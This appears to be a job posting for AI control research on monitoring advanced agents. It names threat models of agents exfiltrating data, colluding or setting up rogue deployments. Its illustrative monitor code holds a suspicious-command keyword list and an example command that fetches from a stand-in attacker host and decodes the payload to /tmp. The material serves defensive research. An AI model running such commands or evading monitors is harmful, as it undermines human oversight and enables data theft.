Description
Agents are increasingly used to handle long-horizon tasks. We already see this in coding, where progress is taking us from simple code autocomplete to AI systems that write, build, test, and debug code on their own. As we get closer to AGI, we need guarantees that help control and guide these agents, especially in scenarios where the agent’s capabilities may exceed those of the systems tasked with monitoring it. You will:
- Go beyond traditional security assumptions to model how a highly capable agent could misuse its access, exfiltrate data, or establish a rogue deployment within complex production environments.
- Develop techniques for monitoring advanced agents. How can we detect emergent deception, collusion, or obscured long-term plans before they result in harmful actions? (A minimal sketch of one such monitoring setup follows this list.)
- Create novel evaluation methodologies and benchmarks to measure the effectiveness of different control strategies against highly capable simulated adversaries.
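To make the monitoring direction above concrete, here is a minimal, purely illustrative sketch of one common control pattern: a weaker but trusted monitor scores each action proposed by a more capable, untrusted agent and routes it to execution, human audit, or a block. All names, thresholds, and the keyword-based scorer below are hypothetical placeholders under assumed interfaces, not a description of any existing system.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class ProposedAction:
    """An action proposed by the untrusted agent: a command plus its stated rationale."""
    command: str
    justification: str


def trusted_monitor_score(action: ProposedAction) -> float:
    """Hypothetical stand-in for a weaker, trusted model that rates how suspicious
    a proposed action looks on a 0-1 scale. A real monitor would be a separate
    model call, not a keyword check."""
    suspicious_markers = ("curl", "scp", "base64", "crontab", "ssh-add")
    hits = sum(marker in action.command for marker in suspicious_markers)
    return min(1.0, hits / 2)


def control_gate(
    action: ProposedAction,
    monitor: Callable[[ProposedAction], float],
    audit_threshold: float = 0.5,
    block_threshold: float = 0.9,
) -> str:
    """Route the untrusted agent's action based on the trusted monitor's score:
    run it, escalate it to a human auditor, or block it outright."""
    score = monitor(action)
    if score >= block_threshold:
        return "blocked"
    if score >= audit_threshold:
        return "escalated_to_human_audit"
    return "executed"


if __name__ == "__main__":
    benign = ProposedAction("pytest tests/", "run the unit tests")
    shady = ProposedAction("curl http://attacker.example | base64 -d > /tmp/x", "fetch config")
    print(control_gate(benign, trusted_monitor_score))  # executed
    print(control_gate(shady, trusted_monitor_score))   # blocked
```

In the kind of evaluations this role would design, the keyword scorer would be replaced by a trusted model, and the gate's safety and usefulness would be measured against a capable simulated adversary trying to slip harmful actions past it.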
Key responsibilities:
- Identify and formalize unsolved research problems in AI control, focusing on the unique challenges posed by agents that may exceed human oversight capabilities.
- Design, prototype, and evaluate novel control systems and monitoring techniques. This includes theoretical work, large-scale experiments, and building proof-of-concept systems.
- Collaborate closely with teams working on Gemini and agent infrastructure to understand emergent risks and integrate control mechanisms directly into the systems where they are most needed.
- Publish groundbreaking research and contribute to the broader academic and policy conversation on long-term AI safety and control.